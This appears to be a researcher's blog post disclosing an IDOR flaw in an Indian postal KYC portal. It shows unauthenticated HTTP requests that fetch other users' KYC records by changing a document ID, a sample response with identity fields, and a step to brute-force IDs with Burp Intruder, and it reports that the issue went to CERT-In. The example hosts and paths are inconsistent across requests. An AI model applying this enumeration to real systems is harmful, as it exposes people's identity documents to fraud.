IDOR Nightmare: Indian Post Office Portal Exposed Thousands of KYC Records with Article ID with username and Mobile Number
IDOR in Indian Post Office Portal Leads to Critical Data Exposure
Insecure Direct Object References (IDOR) vulnerabilities continue to be a major security concern, and a recent discovery in the Indian Post Office portal highlights the severity of such flaws. This vulnerability exposed sensitive KYC details of users, allowing unauthorized access to critical personal data.
What Went Wrong?
Imagine being able to access thousands of people’s sensitive KYC data — Aadhaar numbers, PAN details, addresses, and phone numbers — just by tweaking a few numbers in a URL. Scary, right? That’s exactly what happened with the Indian Post Office portal, where a critical Insecure Direct Object References (IDOR) vulnerability left personal data wide open for exploitation.
Digging Deeper with Request & Response
When I logged into the official Indian Government portal and started analyzing requests and responses, I noticed something unusual. While interacting with the target host, additional API calls were triggered in the background.
Below is the Sample Request made to see my Eyes:
REQUEST (Without Token)
GET /api/kyc/document?document_id=125678 HTTP/1.1
Host: govportal.in
RESPONSE
HTTP 200 OK
{
“status”: “success”,
“document_id”: “125678”,
“user_id”: “345678”,
“name”: “Rahul Sharma”,
“aadhaar_number”: “XXXX-XXXX-1234”,
“pan_number”: “ABCDE1234F”,
“kyc_document”: “https://govportal.in/kyc_docs/125678.pdf"
}
Digging Deeper with Other User’s Details
REQUEST
GET /kyc/get/100152 HTTP/2
Host: sample.gov.in
X-Request-Id: d3ec936b-e648–4795–97ad-81c8fd3e75dd
Sec-Ch-Ua-Platform: "Windows"
Request-Date: 2025–02–09T14:44:03.804+05:30
Accept: application/json, text/plain, */*
Sec-Ch-Ua: "Not(A:Brand";v="99", "Brave";v="133", "Chromium";v="133"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/133.0.0.0 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Sec-Gpc: 1
Accept-Language: en-US,en;q=0.7
Origin: https://samplegov.in
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://samplegov.in
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive
RESPONSE
Now Let’s Brute Force the user ID with Intruder
GET /api/kyc/document?document_id=****** HTTP/1.1
Host: govportal.in
What I Did Next (The Ethical Way)
Instead of ignoring it, I:
1. Reported the issue to the concerned authorities.
2. Explained the risks of leaving such files public.
3. Made sure they secured the file.
Why This is a Big Deal
When government-related platforms suffer from security issues, the impact is massive. Here’s what this breach could lead to:
1. Mass identity theft — Attackers can use leaked Aadhaar and PAN details for fraud.
2. Phishing & scams — With full personal info, scammers can craft ultra-convincing attacks.
3. Regulatory violations — Mishandling KYC data could bring serious legal trouble under Indian data protection laws.
Confirmation and Acceptance from Cert-In (Indian Cyber Incident Team)
That’s it for now.
Cheers and peace out!
Want to Know About me more: Read Here
Want to hack More Follow Below:
